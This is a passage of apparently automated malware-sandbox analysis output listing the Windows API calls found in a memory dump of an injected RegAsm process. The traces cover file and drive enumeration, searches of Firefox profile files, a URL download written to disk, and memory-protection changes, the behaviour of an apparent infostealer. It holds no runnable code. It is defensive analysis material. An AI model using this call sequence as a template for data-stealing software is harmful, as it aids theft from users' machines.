                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 3193997572-0
                                                                                    • Opcode ID: cbc7415a79d248715024c5578be9318ededcedd343755c6c1e1074800eddd929
                                                                                    • Instruction ID: 8b519aabfee9ba70be02ce4985194bad941b289c0cb22c07f372139e5295b5b5
                                                                                    • Opcode Fuzzy Hash: cbc7415a79d248715024c5578be9318ededcedd343755c6c1e1074800eddd929
                                                                                    • Instruction Fuzzy Hash: 89A13C71904248EADB15EBE5D955BEDBBB4AF18308F5040BEE406735C2DB782B0CDB26
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004165DE
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 00416620
                                                                                    • lstrcat.KERNEL32(?), ref: 0041663F
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 004162AF: _EH_prolog.MSVCRT ref: 004162B4
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 004162D4
                                                                                      • Part of subcall function 004162AF: FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                                      • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,00426908), ref: 00416308
                                                                                      • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,0042690C), ref: 00416322
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416346
                                                                                      • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,0042657D), ref: 00416357
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416374
                                                                                      • Part of subcall function 004162AF: PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,00426924), ref: 004163D9
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,00426928), ref: 004163FB
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416388
                                                                                      • Part of subcall function 004162AF: FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                                      • Part of subcall function 004162AF: FindClose.KERNEL32(00000000), ref: 004165B9
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$H_prologwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                    • String ID:
                                                                                    • API String ID: 25485560-0
                                                                                    • Opcode ID: 7b2ca0ca87c53fab111104ad7f9c0e0035106a6dff0b3672f02f9ca4e90a9d0e
                                                                                    • Instruction ID: a017e0cda9a087e3faea27a0b0bd6cecf8e4da27d40e214f5f1144f69bbc44a5
                                                                                    • Opcode Fuzzy Hash: 7b2ca0ca87c53fab111104ad7f9c0e0035106a6dff0b3672f02f9ca4e90a9d0e
                                                                                    • Instruction Fuzzy Hash: 7C41BE71D4022DABCF10ABB0DC13DED3B79AB0C304F00466AF844A2192E77997958B96
                                                                                    APIs
                                                                                    • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C6C3095
                                                                                      • Part of subcall function 6C6C35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C74F688,00001000), ref: 6C6C35D5
                                                                                      • Part of subcall function 6C6C35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6C35E0
                                                                                      • Part of subcall function 6C6C35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C6C35FD
                                                                                      • Part of subcall function 6C6C35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C6C363F
                                                                                      • Part of subcall function 6C6C35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C6C369F
                                                                                      • Part of subcall function 6C6C35A0: __aulldiv.LIBCMT ref: 6C6C36E4
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6C309F
                                                                                      • Part of subcall function 6C6E5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6E56EE,?,00000001), ref: 6C6E5B85
                                                                                      • Part of subcall function 6C6E5B50: EnterCriticalSection.KERNEL32(6C74F688,?,?,?,6C6E56EE,?,00000001), ref: 6C6E5B90
                                                                                      • Part of subcall function 6C6E5B50: LeaveCriticalSection.KERNEL32(6C74F688,?,?,?,6C6E56EE,?,00000001), ref: 6C6E5BD8
                                                                                      • Part of subcall function 6C6E5B50: GetTickCount64.KERNEL32 ref: 6C6E5BE4
                                                                                    • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C6C30BE
                                                                                      • Part of subcall function 6C6C30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C6C3127
                                                                                      • Part of subcall function 6C6C30F0: __aulldiv.LIBCMT ref: 6C6C3140
                                                                                      • Part of subcall function 6C6FAB2A: __onexit.LIBCMT ref: 6C6FAB30
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                     • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                    • String ID:
                                                                                    • API String ID: 4291168024-0
                                                                                    • Opcode ID: eed07f006ddc9d7c6a3acb011cfcb79c37fa90e6d122bbdd161e6047a543cf0f
                                                                                    • Instruction ID: d9840a7a725a3dcf93fc1f473b10c0c415ebc47068d3d7624a24314bf999e2cf
                                                                                    • Opcode Fuzzy Hash: eed07f006ddc9d7c6a3acb011cfcb79c37fa90e6d122bbdd161e6047a543cf0f
                                                                                    • Instruction Fuzzy Hash: 0DF0D622E2074897CB10FF3498411E6B371EF6B218F50933BE85853521FB2061D8838F
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00411EBD
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00404DCA: _EH_prolog.MSVCRT ref: 00404DCF
                                                                                      • Part of subcall function 00404DCA: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
                                                                                      • Part of subcall function 00404DCA: StrCmpCA.SHLWAPI(?), ref: 00404E38
                                                                                      • Part of subcall function 00404DCA: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
                                                                                      • Part of subcall function 00404DCA: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
                                                                                      • Part of subcall function 00404DCA: InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
                                                                                      • Part of subcall function 00404DCA: CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
                                                                                      • Part of subcall function 00404DCA: InternetCloseHandle.WININET(00000000), ref: 00404EE9
                                                                                      • Part of subcall function 00404DCA: InternetCloseHandle.WININET(?), ref: 00404EF2
                                                                                      • Part of subcall function 00404DCA: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologInternetlstrcpy$CloseFileHandle$Openlstrcat$CreateReadWritelstrlen
                                                                                    • String ID: B
                                                                                    • API String ID: 1244342732-1255198513
                                                                                    • Opcode ID: 445673c05ee04e935469998d6e1ad7673640e60efa6b345dae39504cf7bb3895
                                                                                    • Instruction ID: 7cb4668c239315be8392dc4a7e389f554ac74aed044ceac891e831ccfcc386df
                                                                                    • Opcode Fuzzy Hash: 445673c05ee04e935469998d6e1ad7673640e60efa6b345dae39504cf7bb3895
                                                                                    • Instruction Fuzzy Hash: 64529E70904288EADB15EBE4D556BDDBBB49F28308F5040BEE449736C2DB781B4CCB66
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040B8B4
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040B463: _EH_prolog.MSVCRT ref: 0040B468
                                                                                      • Part of subcall function 0040B463: FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F68,?,?,00425C47,?,00000000,?), ref: 0040B4E7
                                                                                      • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,00425F6C,?,00000000,?), ref: 0040B50B
                                                                                      • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,00425F70,?,00000000,?), ref: 0040B525
                                                                                      • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F74,?,?,00425C4A,?,00000000,?), ref: 0040B5C1
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrcat$FileFindFirstFolderPathlstrlen
                                                                                    • String ID: \..\
                                                                                    • API String ID: 271224408-4220915743
                                                                                    • Opcode ID: 2fdf3e075c31b22ca8a354aaf151d811bcf78c1484277b32c5798bb14829cd02
                                                                                    • Instruction ID: 6c2274da3a54e78b00ef882603e8e3fe35884a936ae60c4e7c9158b4c67c68f5
                                                                                    • Opcode Fuzzy Hash: 2fdf3e075c31b22ca8a354aaf151d811bcf78c1484277b32c5798bb14829cd02
                                                                                    • Instruction Fuzzy Hash: DFA15FB1900288AACB14FBE5D556BDDBBB4AF19308F50417EE845736C2DB78170CCBA6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (@
                                                                                    • API String ID: 0-1346038526
                                                                                    • Opcode ID: 14c096e7427ac56c3ceb53db33e20d9e6aa561a8e8b35fd361e21ef125d2a38f
                                                                                    • Instruction ID: a472476b622eda2900000c9113d1a74c1da44a18ff9f30f91f8d3e78ba7694db
                                                                                    • Opcode Fuzzy Hash: 14c096e7427ac56c3ceb53db33e20d9e6aa561a8e8b35fd361e21ef125d2a38f
                                                                                    • Instruction Fuzzy Hash: 2B4136B190461AAFCF14EF94D9909AFBBB1EB04314F10447FEA05B7391D6789A818F98
                                                                                    APIs
                                                                                    • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,00000000,?,?,00405E98), ref: 00405DE8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-3916222277
                                                                                    • Opcode ID: b6b970fa2179954ca2d24890c2a9fa622aa91f7321e7267b4cd12840a3a9e1b1
                                                                                    • Instruction ID: ced7d7a04c1373fcb48adb74aa7fd2d2290691d2abba1c02f51b3daadd827661
                                                                                    • Opcode Fuzzy Hash: b6b970fa2179954ca2d24890c2a9fa622aa91f7321e7267b4cd12840a3a9e1b1
                                                                                    • Instruction Fuzzy Hash: A7113A71515A0AEBEF20CF94C9887ABB7F5FF04340F6084279541E62C0D7789A85EFA9
                                                                                    APIs
                                                                                    • SHFileOperationA.SHELL32(?), ref: 00411289
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileOperation
                                                                                    • String ID: ^qA
                                                                                    • API String ID: 3080627654-2929517337
                                                                                    • Opcode ID: b86a9cf137741d795d42c8fdc09233bf8a42cfbe6d8886dfb6df5f219da20288
                                                                                    • Instruction ID: cea7c5b2f21ce40cf92ecfc9ca7a06bfbd61282a3af7cf5c5322f6d4fd748434
                                                                                    • Opcode Fuzzy Hash: b86a9cf137741d795d42c8fdc09233bf8a42cfbe6d8886dfb6df5f219da20288
                                                                                    • Instruction Fuzzy Hash: BAE0E5B0E0021D9FCB44EFA4E5456EEBBF4FF08308F40806AC509F7240E3B452458BA9
                                                                                    APIs
                                                                                    • GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CurrentProfile
                                                                                    • String ID: Unknown
                                                                                    • API String ID: 2104809126-1654365787
                                                                                    • Opcode ID: 5e10422413539b42bf5c0f3fa128b12628a931a4afcc5f0832f78eb075a7ee3b
                                                                                    • Instruction ID: 3d2c3ff73f9fd288211faec72780458d1f3465e1919466c86557ea86080fd633
                                                                                    • Opcode Fuzzy Hash: 5e10422413539b42bf5c0f3fa128b12628a931a4afcc5f0832f78eb075a7ee3b
                                                                                    • Instruction Fuzzy Hash: 49E01270A0010DFBDB10DBA4DA85FDE77BC6B04348F508525EA45D3181DBB8E649DBA9
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00410CE2
                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AttributesFileH_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3244726999-0
                                                                                    • Opcode ID: 9858cde492175e4580259da3237b0586ce143e2643660db7b1ce31a318e284b7
                                                                                    • Instruction ID: 23f90a50d93cb2e1358a652bfa6555910aea1ee46ff196ae4cba0ec79dbf811d
                                                                                    • Opcode Fuzzy Hash: 9858cde492175e4580259da3237b0586ce143e2643660db7b1ce31a318e284b7
                                                                                    • Instruction Fuzzy Hash: BEE09B305005149BC714AFA4E4016CDB720EF05764F10422EE866A25D5C7385B45C684
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,?,00000000,?,?,00405E55,00000000,00000000), ref: 00405AB2
                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00000000,?,?,00405E55,00000000,00000000), ref: 00405ADE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 1c251f108aa80a173728c8da74072c4a570c277b0e51025ace0a2ede7004c7e8
                                                                                    • Instruction ID: 0100467e13e99263edfc9c933cb68e83bd3c9ecc7dabaf0022702558aaebf942
                                                                                    • Opcode Fuzzy Hash: 1c251f108aa80a173728c8da74072c4a570c277b0e51025ace0a2ede7004c7e8
                                                                                    • Instruction Fuzzy Hash: 2521AE71700B059BDB24CFB4CC81BABB7F5EB44314F24492AE61AD72D0D278AD408F18
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040D3FF
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                      • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040A893: _EH_prolog.MSVCRT ref: 0040A898
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 2625060131-0
                                                                                    • Opcode ID: 56088f79004cf497bad3f02a7e5291dcc555a9d03921c7f1e9fa0e27b921b9e5
                                                                                    • Instruction ID: 500d7c88a2085726728d35326e6952772f3e0e38a46ae67bbb90ee8c45411e9d
                                                                                    • Opcode Fuzzy Hash: 56088f79004cf497bad3f02a7e5291dcc555a9d03921c7f1e9fa0e27b921b9e5
                                                                                    • Instruction Fuzzy Hash: 53915EB1D0024CEADF15EBE5D952BDEBBB8AF18308F50417EE40573282DA78570C8B66
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040A898
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00409F72: _EH_prolog.MSVCRT ref: 00409F77
                                                                                      • Part of subcall function 00409F72: FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00425C06,00000000,-00000020,00000000), ref: 00409FF6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$FileFindFirstlstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1592259726-0
                                                                                    • Opcode ID: 04f1566bf03f5b57a7be48995494788b674163e3f1712f7d1c8d8cfa6d3f667e
                                                                                    • Instruction ID: 11f6703c6529ff65c6027a0a45f3fdb3f97caadc550874a50ef78dc79f4eaafe
                                                                                    • Opcode Fuzzy Hash: 04f1566bf03f5b57a7be48995494788b674163e3f1712f7d1c8d8cfa6d3f667e
                                                                                    • Instruction Fuzzy Hash: F62171B1900249EBDF20FFA9C9067DDBFB4AF45314F00416EE88963281D7795708CBA6
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00401EDB
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00401162: _EH_prolog.MSVCRT ref: 00401167
                                                                                      • Part of subcall function 00401162: FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00422374,?,?,?,00422370,?,?,00000000,?,00000000), ref: 004013AC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$FileFindFirstlstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1592259726-0
                                                                                    • Opcode ID: 07963b33fdd111526faf395668dc4852c6ae53a02adfa156883a701ca86dbaae
                                                                                    • Instruction ID: 28e08b363bcf4c13626f635e6ad0a869a568ad08ab8b3845b1d26a2f95c805ed
                                                                                    • Opcode Fuzzy Hash: 07963b33fdd111526faf395668dc4852c6ae53a02adfa156883a701ca86dbaae
                                                                                    • Instruction Fuzzy Hash: 4A215071D00249ABDF20FB69C94679DBFB4AF44714F00452EE89873282DB395749CBD6
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00415A3F
                                                                                      • Part of subcall function 00412D62: _EH_prolog.MSVCRT ref: 00412D67
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00415843: _EH_prolog.MSVCRT ref: 00415848
                                                                                      • Part of subcall function 00415843: GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004158AA
                                                                                      • Part of subcall function 00415843: memset.MSVCRT ref: 004158C9
                                                                                      • Part of subcall function 00415843: GetDriveTypeA.KERNEL32(?), ref: 004158D2
                                                                                      • Part of subcall function 00415843: lstrcpy.KERNEL32(?,00000000), ref: 004158F2
                                                                                      • Part of subcall function 00415843: lstrcpy.KERNEL32(?,00000000), ref: 00415933
                                                                                      • Part of subcall function 00415843: lstrlenA.KERNEL32(?), ref: 00415998
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
